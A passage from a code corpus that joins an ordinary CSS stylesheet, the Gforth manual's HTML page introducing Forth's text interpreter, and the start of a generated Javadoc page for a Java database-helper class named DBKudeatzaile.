.col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666667%; } .col-md-pull-7 { right: 58.33333333%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666667%; } .col-md-pull-4 { right: 33.33333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.66666667%; } .col-md-pull-1 { right: 8.33333333%; } .col-md-pull-0 { right: auto; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666667%; } .col-md-push-10 { left: 83.33333333%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666667%; } .col-md-push-7 { left: 58.33333333%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666667%; } .col-md-push-4 { left: 33.33333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.66666667%; } .col-md-push-1 { left: 8.33333333%; } .col-md-push-0 { left: auto; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666667%; } .col-md-offset-10 { margin-left: 83.33333333%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666667%; } .col-md-offset-7 { margin-left: 58.33333333%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666667%; } .col-md-offset-4 { margin-left: 33.33333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.66666667%; } .col-md-offset-1 { margin-left: 8.33333333%; } .col-md-offset-0 { margin-left: 0; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666667%; } .col-lg-10 { width: 83.33333333%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666667%; } .col-lg-7 { width: 58.33333333%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666667%; } .col-lg-4 { width: 33.33333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.66666667%; } .col-lg-1 { width: 8.33333333%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666667%; } .col-lg-pull-10 { right: 83.33333333%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666667%; } .col-lg-pull-7 { right: 58.33333333%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666667%; } .col-lg-pull-4 { right: 33.33333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.66666667%; } .col-lg-pull-1 { right: 8.33333333%; } .col-lg-pull-0 { right: auto; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666667%; } .col-lg-push-10 { left: 83.33333333%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666667%; } .col-lg-push-7 { left: 58.33333333%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666667%; } .col-lg-push-4 { left: 33.33333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.66666667%; } .col-lg-push-1 { left: 8.33333333%; } .col-lg-push-0 { left: auto; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666667%; } .col-lg-offset-10 { margin-left: 83.33333333%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666667%; } .col-lg-offset-7 { margin-left: 58.33333333%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666667%; } .col-lg-offset-4 { margin-left: 33.33333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.66666667%; } .col-lg-offset-1 { margin-left: 8.33333333%; } .col-lg-offset-0 { margin-left: 0; } } .container { padding-right: 12px; padding-left: 12px; } @media (min-width: 768px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 992px) { .container { padding-right: 24px; padding-left: 24px; } } @media (min-width: 1200px) { .container { padding-right: 24px; padding-left: 24px; } } /*!_text-styling v3.0.0*/ /*! normalize.css v4.0.0 | MIT License | github.com/necolas/normalize.css */ /** * 1. Change the default font family in all browsers (opinionated). * 2. Prevent adjustments of font size after orientation changes in IE and iOS. */ html { font-family: sans-serif; /* 1 */ -ms-text-size-adjust: 100%; /* 2 */ -webkit-text-size-adjust: 100%; /* 2 */ } /** * Remove the margin in all browsers (opinionated). */ body { margin: 0; } /* HTML5 display definitions ========================================================================== */ /** * Add the correct display in IE 9-. * 1. Add the correct display in Edge, IE, and Firefox. * 2. Add the correct display in IE. */ article, aside, details, figcaption, figure, footer, header, main, menu, nav, section, summary { /* 1 */ display: block; } /** * Add the correct display in IE 9-. */ audio, canvas, progress, video { display: inline-block; } /** * Add the correct display in iOS 4-7. */ audio:not([controls]) { display: none; height: 0; } /** * Add the correct vertical alignment in Chrome, Firefox, and Opera. */ progress { vertical-align: baseline; } /** * Add the correct display in IE 10-. * 1. Add the correct display in IE. */ template, [hidden] { display: none; } /* Links ========================================================================== */ /** * Remove the gray background on active links in IE 10. */ a { background-color: transparent; } /** * Remove the outline on focused links when they are also active or hovered * in all browsers (opinionated). */ a:active, a:hover { outline-width: 0; } /* Text-level semantics ========================================================================== */ /** * 1. Remove the bottom border in Firefox 39-. * 2. Add the correct text decoration in Chrome, Edge, IE, Opera, and Safari. */ abbr[title] { border-bottom: none; /* 1 */ text-decoration: underline; /* 2 */ text-decoration: underline dotted; /* 2 */ } /** * Prevent the duplicate application of `bolder` by the next rule in Safari 6. */ b, strong { font-weight: inherit; } /** * Add the correct font weight in Chrome, Edge, and Safari. */ b, strong { font-weight: bolder; } /** * Add the correct font style in Android 4.3-. */ dfn { font-style: italic; } /** * Correct the font size and margin on `h1` elements within `section` and * `article` contexts in Chrome, Firefox, and Safari. */ h1 { font-size: 2em; margin: 0.67em 0; } /** * Add the correct background and color in IE 9-. */ mark { background-color: #ff0; color: #000; } /** * Add the correct font size in all browsers. */ small { font-size: 80%; } /** * Prevent `sub` and `sup` elements from affecting the line height in * all browsers. */ sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sub { bottom: -0.25em; } sup { top: -0.5em; } /* Embedded content ========================================================================== */ /** * Remove the border on images inside links in IE 10-. */ img { border-style: none; } /** * Hide the overflow in IE. */ svg:not(:root) { overflow: hidden; } /* Grouping content ========================================================================== */ /** * 1. Correct the inheritance and scaling of font size in all browsers. * 2. Correct the odd `em` font sizing in all browsers. */ code, kbd, pre, samp { font-family: monospace, monospace; /* 1 */ font-size: 1em; /* 2 */ } /** * Add the correct margin in IE 8. */ figure { margin: 1em 40px; } /** * 1. Add the correct box sizing in Firefox. * 2. Show the overflow in Edge and IE. */ hr { box-sizing: content-box; /* 1 */ height: 0; /* 1 */ overflow: visible; /* 2 */ } /* Forms ========================================================================== */ /** * Change font properties to `inherit` in all browsers (opinionated). */ button, input, select, textarea { font: inherit; } /** * Restore the font weight unset by the previous rule. */ optgroup { font-weight: bold; } /** * Show the overflow in IE. * 1. Show the overflow in Edge. * 2. Show the overflow in Edge, Firefox, and IE. */ button, input, select { /* 2 */ overflow: visible; } /** * Remove the margin in Safari. * 1. Remove the margin in Firefox and Safari. */ button, input, select, textarea { /* 1 */ margin: 0; } /** * Remove the inheritence of text transform in Edge, Firefox, and IE. * 1. Remove the inheritence of text transform in Firefox. */ button, select { /* 1 */ text-transform: none; } /** * Change the cursor in all browsers (opinionated). */ button, [type="button"], [type="reset"], [type="submit"] { cursor: pointer; } /** * Restore the default cursor to disabled elements unset by the previous rule. */ [disabled] { cursor: default; } /** * 1. Prevent a WebKit bug where (2) destroys native `audio` and `video` * controls in Android 4. * 2. Correct the inability to style clickable types in iOS. */ button, html [type="button"], [type="reset"], [type="submit"] { -webkit-appearance: button; /* 2 */ } /** * Remove the inner border and padding in Firefox. */ button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } /** * Restore the focus styles unset by the previous rule. */ button:-moz-focusring, input:-moz-focusring { outline: 1px dotted ButtonText; } /** * Change the border, margin, and padding in all browsers (opinionated). */ fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } /** * 1. Correct the text wrapping in Edge and IE. * 2. Correct the color inheritance from `fieldset` elements in IE. * 3. Remove the padding so developers are not caught out when they zero out * `fieldset` elements in all browsers. */ legend { box-sizing: border-box; /* 1 */ color: inherit; /* 2 */ display: table; /* 1 */ max-width: 100%; /* 1 */ padding: 0; /* 3 */ white-space: normal; /* 1 */ } /** * Remove the default vertical scrollbar in IE. */ textarea { overflow: auto; } /** * 1. Add the correct box sizing in IE 10-. * 2. Remove the padding in IE 10-. */ [type="checkbox"], [type="radio"] { box-sizing: border-box; /* 1 */ padding: 0; /* 2 */ } /** * Correct the cursor style of increment and decrement buttons in Chrome. */ [type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { height: auto; } /** * Correct the odd appearance of search inputs in Chrome and Safari. */ [type="search"] { -webkit-appearance: textfield; } /** * Remove the inner padding and cancel buttons in Chrome on OS X and * Safari on OS X. */ [type="search"]::-webkit-search-cancel-button, [type="search"]::-webkit-search-decoration { -webkit-appearance: none; } .h1 { font-size: 30px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 18px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h1 { font-size: 36px; } } .h1.body-font { font-weight: 700; } .h2 { font-size: 24px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h2 { font-size: 30px; } } .h2.body-font { font-weight: 700; } .h3 { font-size: 18px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h3 { font-size: 24px; } } .h3.body-font { font-weight: 700; } .h4 { font-size: 16px; color: #4d5157; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h4 { font-size: 18px; } } .h4.body-font { font-weight: 700; } .h5 { font-size: 16px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 6px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h5.body-font { font-weight: 700; } .h6 { font-size: 14px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 0px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h6.body-font { font-weight: 700; } h1, h2, h3, h4, h5, h6 { line-height: 1.1; } /* * SETTINGS */ .h1 { font-size: 30px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 18px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h1 { font-size: 36px; } } .h1.body-font { font-weight: 700; } .h2 { font-size: 24px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h2 { font-size: 30px; } } .h2.body-font { font-weight: 700; } .h3 { font-size: 18px; color: #7e7357; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h3 { font-size: 24px; } } .h3.body-font { font-weight: 700; } .h4 { font-size: 16px; color: #4d5157; font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 18px; margin-bottom: 12px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } @media (min-width: 768px) { .h4 { font-size: 18px; } } .h4.body-font { font-weight: 700; } .h5 { font-size: 16px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 6px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h5.body-font { font-weight: 700; } .h6 { font-size: 14px; color: #4d5157; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; margin-top: 12px; margin-bottom: 0px; font-weight: 700; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .h6.body-font { font-weight: 700; } body { font-size: 0.875em; line-height: 1.428571429; color: #20262d; background-color: #f0f1f2; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } abbr[title] { cursor: help; border-bottom: 1px dotted #20262d; text-decoration: none; } address { font-style: normal; } blockquote { font-size: 16px; font-weight: 300; } mark { background-color: #f0ded7; } p { margin: 0.8571428572em 0; } dl dt { font-weight: 700; } dl dd { margin: 0; } ::-moz-selection { background-color: #f0ded7; } ::selection { background-color: #f0ded7; } a { color: #b45c38; text-decoration: underline; } a:hover, a:focus { color: #b45c38; text-decoration: underline; } a:focus { outline: none; color: #b45c38; } .is-keyboarduser a:focus { outline: 2px dotted #000; outline-offset: 0.5rem; } .is-keyboarduser a:focus { background-color: #fff; } a:hover { outline: none; background-color: transparent; } @media print { * { text-shadow: none !important; color: #000 !important; background: #fff !important; box-shadow: none !important; border-color: #000 !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="javascript:"]:after, a[href^="#"]:after { content: ""; } pre, blockquote { border: 1px solid #999; padding: 6px; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } p a { word-wrap: break-word; } select { background: #fff !important; } .container, .container-fluid { margin: auto; width: auto; } } /*!checkboxes v2.0.1 BOM*/ /* * checkboxes mixins * */ /* * SETTINGS */ .checkbox { display: inline-table; height: 32px; vertical-align: middle; position: relative; } .checkbox .checkbox-input { position: absolute; top: 10px; left: 10px; z-index: 0; } .checkbox-flip.checkbox .checkbox-input { left: auto; right: 10px; } .checkbox .checkbox-input:focus + .checkbox-text { outline: none; } .is-keyboarduser .checkbox .checkbox-input:focus + .checkbox-text { outline: 2px dotted #000; outline-offset: 0.5rem; } .checkbox .checkbox-input:hover + .checkbox-text { outline: none; } .checkbox .checkbox-input:disabled + .checkbox-text { color: #69727e; } .checkbox .checkbox-input:disabled + .checkbox-text:hover { cursor: not-allowed; } .checkbox .checkbox-text { font-weight: 400; line-height: 1.2; padding-left: 38px; display: table-cell; vertical-align: middle; white-space: normal; } .checkbox .checkbox-text:after { content: ''; display: block; position: absolute; left: 0; top: 0; width: 32px; height: 32px; z-index: 1; } .checkbox .checkbox-text:hover { cursor: pointer; } .checkbox-flip.checkbox .checkbox-text { padding-left: 0; padding-right: 38px; } .checkbox-flip.checkbox .checkbox-text:after { left: auto; right: 0; } .checkbox + .checkbox { margin-left: 18px; } .ie8 .checkbox { min-height: 0; height: auto; } .ie8 .checkbox .checkbox-input { position: static; } .ie8 .checkbox .checkbox-text { padding-left: 6px; } .ie8 .checkbox .checkbox-text:after { background: none; } .checkbox-flip.ie8 .checkbox .checkbox-text { padding-right: 6px; } @media print { .checkbox .checkbox-input { opacity: 1; position: static; } .checkbox .checkbox-text { padding: 0; display: inline; } }
gforth.docset/Contents/Resources/Documents/Introducing-the-Text-Interpreter.html
mpgirro/gforth-dash-docset
<html lang="en"> <head> <title>Introducing the Text Interpreter - Gforth Manual</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="Gforth Manual"> <meta name="generator" content="makeinfo 4.9"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="Introduction.html#Introduction" title="Introduction"> <link rel="prev" href="Introduction.html#Introduction" title="Introduction"> <link rel="next" href="Stacks-and-Postfix-notation.html#Stacks-and-Postfix-notation" title="Stacks and Postfix notation"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- This manual is for Gforth (version 0.7.0, November 2, 2008), a fast and portable implementation of the ANS Forth language. It serves as reference manual, but it also contains an introduction to Forth and a Forth tutorial. Copyright (C) 1995, 1996, 1997, 1998, 2000, 2003, 2004,2005,2006,2007,2008 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation; with no Invariant Sections, with the Front-Cover texts being ``A GNU Manual,'' and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled ``GNU Free Documentation License.'' (a) The FSF's Back-Cover Text is: ``You have freedom to copy and modify this GNU Manual, like GNU software. Copies published by the Free Software Foundation raise funds for GNU development.'' --> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> </head> <body> <div class="node"> <p> <a name="Introducing-the-Text-Interpreter"></a> Next:&nbsp;<a rel="next" accesskey="n" href="Stacks-and-Postfix-notation.html#Stacks-and-Postfix-notation">Stacks and Postfix notation</a>, Previous:&nbsp;<a rel="previous" accesskey="p" href="Introduction.html#Introduction">Introduction</a>, Up:&nbsp;<a rel="up" accesskey="u" href="Introduction.html#Introduction">Introduction</a> <hr> </div> <h3 class="section">4.1 Introducing the Text Interpreter</h3> <p><a name="index-text-interpreter-138"></a><a name="index-outer-interpreter-139"></a> <!-- IMO this is too detailed and the pace is too slow for --> <!-- an introduction. If you know German, take a look at --> <!-- http://www.complang.tuwien.ac.at/anton/lvas/skriptum-stack.html --> <!-- to see how I do it - anton --> <!-- nac-> Where I have accepted your comments 100% and modified the text --> <!-- accordingly, I have deleted your comments. Elsewhere I have added a --> <!-- response like this to attempt to rationalise what I have done. Of --> <!-- course, this is a very clumsy mechanism for something that would be --> <!-- done far more efficiently over a beer. Please delete any dialogue --> <!-- you consider closed. --> <p>When you invoke the Forth image, you will see a startup banner printed and nothing else (if you have Gforth installed on your system, try invoking it now, by typing <kbd>gforth&lt;RET&gt;</kbd>). Forth is now running its command line interpreter, which is called the <dfn>Text Interpreter</dfn> (also known as the <dfn>Outer Interpreter</dfn>). (You will learn a lot about the text interpreter as you read through this chapter, for more detail see <a href="The-Text-Interpreter.html#The-Text-Interpreter">The Text Interpreter</a>). <p>Although it's not obvious, Forth is actually waiting for your input. Type a number and press the &lt;RET&gt; key: <pre class="example"> <kbd>45&lt;RET&gt;</kbd> ok </pre> <p>Rather than give you a prompt to invite you to input something, the text interpreter prints a status message <i>after</i> it has processed a line of input. The status message in this case (&ldquo;<code> ok</code>&rdquo; followed by carriage-return) indicates that the text interpreter was able to process all of your input successfully. Now type something illegal: <pre class="example"> <kbd>qwer341&lt;RET&gt;</kbd> *the terminal*:2: Undefined word &gt;&gt;&gt;qwer341&lt;&lt;&lt; Backtrace: $2A95B42A20 throw $2A95B57FB8 no.extensions </pre> <p>The exact text, other than the &ldquo;Undefined word&rdquo; may differ slightly on your system, but the effect is the same; when the text interpreter detects an error, it discards any remaining text on a line, resets certain internal state and prints an error message. For a detailed description of error messages see <a href="Error-messages.html#Error-messages">Error messages</a>. <p>The text interpreter waits for you to press carriage-return, and then processes your input line. Starting at the beginning of the line, it breaks the line into groups of characters separated by spaces. For each group of characters in turn, it makes two attempts to do something: <ul> <li><a name="index-name-dictionary-140"></a>It tries to treat it as a command. It does this by searching a <dfn>name dictionary</dfn>. If the group of characters matches an entry in the name dictionary, the name dictionary provides the text interpreter with information that allows the text interpreter perform some actions. In Forth jargon, we say that the group <a name="index-word-141"></a><a name="index-definition-142"></a><a name="index-execution-token-143"></a><a name="index-xt-144"></a>of characters names a <dfn>word</dfn>, that the dictionary search returns an <dfn>execution token (xt)</dfn> corresponding to the <dfn>definition</dfn> of the word, and that the text interpreter executes the xt. Often, the terms <dfn>word</dfn> and <dfn>definition</dfn> are used interchangeably. <li>If the text interpreter fails to find a match in the name dictionary, it tries to treat the group of characters as a number in the current number base (when you start up Forth, the current number base is base 10). If the group of characters legitimately represents a number, the text interpreter pushes the number onto a stack (we'll learn more about that in the next section). </ul> <p>If the text interpreter is unable to do either of these things with any group of characters, it discards the group of characters and the rest of the line, then prints an error message. If the text interpreter reaches the end of the line without error, it prints the status message &ldquo;<code> ok</code>&rdquo; followed by carriage-return. <p>This is the simplest command we can give to the text interpreter: <pre class="example"> &lt;RET&gt; ok </pre> <p>The text interpreter did everything we asked it to do (nothing) without an error, so it said that everything is &ldquo;<code> ok</code>&rdquo;. Try a slightly longer command: <pre class="example"> <kbd>12 dup fred dup&lt;RET&gt;</kbd> *the terminal*:3: Undefined word 12 dup &gt;&gt;&gt;fred&lt;&lt;&lt; dup Backtrace: $2A95B42A20 throw $2A95B57FB8 no.extensions </pre> <p>When you press the carriage-return key, the text interpreter starts to work its way along the line: <ul> <li>When it gets to the space after the <code>2</code>, it takes the group of characters <code>12</code> and looks them up in the name dictionary<a rel="footnote" href="Introducing-the-Text-Interpreter.html#fn-1" name="fnd-1"><sup>1</sup></a>. There is no match for this group of characters in the name dictionary, so it tries to treat them as a number. It is able to do this successfully, so it puts the number, 12, &ldquo;on the stack&rdquo; (whatever that means). <li>The text interpreter resumes scanning the line and gets the next group of characters, <code>dup</code>. It looks it up in the name dictionary and (you'll have to take my word for this) finds it, and executes the word <code>dup</code> (whatever that means). <li>Once again, the text interpreter resumes scanning the line and gets the group of characters <code>fred</code>. It looks them up in the name dictionary, but can't find them. It tries to treat them as a number, but they don't represent any legal number. </ul> <p>At this point, the text interpreter gives up and prints an error message. The error message shows exactly how far the text interpreter got in processing the line. In particular, it shows that the text interpreter made no attempt to do anything with the final character group, <code>dup</code>, even though we have good reason to believe that the text interpreter would have no problem looking that word up and executing it a second time. <!-- --> <div class="footnote"> <hr> <h4>Footnotes</h4><p class="footnote"><small>[<a name="fn-1" href="Introducing-the-Text-Interpreter.html#fnd-1">1</a>]</small> We can't tell if it found them or not, but assume for now that it did not</p> <p><hr></div> </body></html>
doc/db/DBKudeatzaile.html
UPV-EHU-Bilbao/algTwitter
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (1.8.0_65) on Wed Dec 16 19:03:52 CET 2015 --> <title>DBKudeatzaile</title> <meta name="date" content="2015-12-16"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> <script type="text/javascript" src="../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="DBKudeatzaile"; } } catch(err) { } //--> var methods = {"i0":10,"i1":10,"i2":9}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/DBKudeatzaile.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Class</li> <li><a href="../db/Eragiketak.html" title="class in db"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../index.html?db/DBKudeatzaile.html" target="_top">Frames</a></li> <li><a href="DBKudeatzaile.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">db</div> <h2 title="Class DBKudeatzaile" class="title">Class DBKudeatzaile</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>db.DBKudeatzaile</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="typeNameLabel">DBKudeatzaile</span> extends java.lang.Object</pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../db/DBKudeatzaile.html#conOpen--">conOpen</a></span>()</code>&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>java.sql.ResultSet</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../db/DBKudeatzaile.html#execSQL-java.lang.String-">execSQL</a></span>(java.lang.String&nbsp;query)</code>&nbsp;</td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>static <a href="../db/DBKudeatzaile.html" title="class in db">DBKudeatzaile</a></code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../db/DBKudeatzaile.html#getInstantzia--">getInstantzia</a></span>()</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ 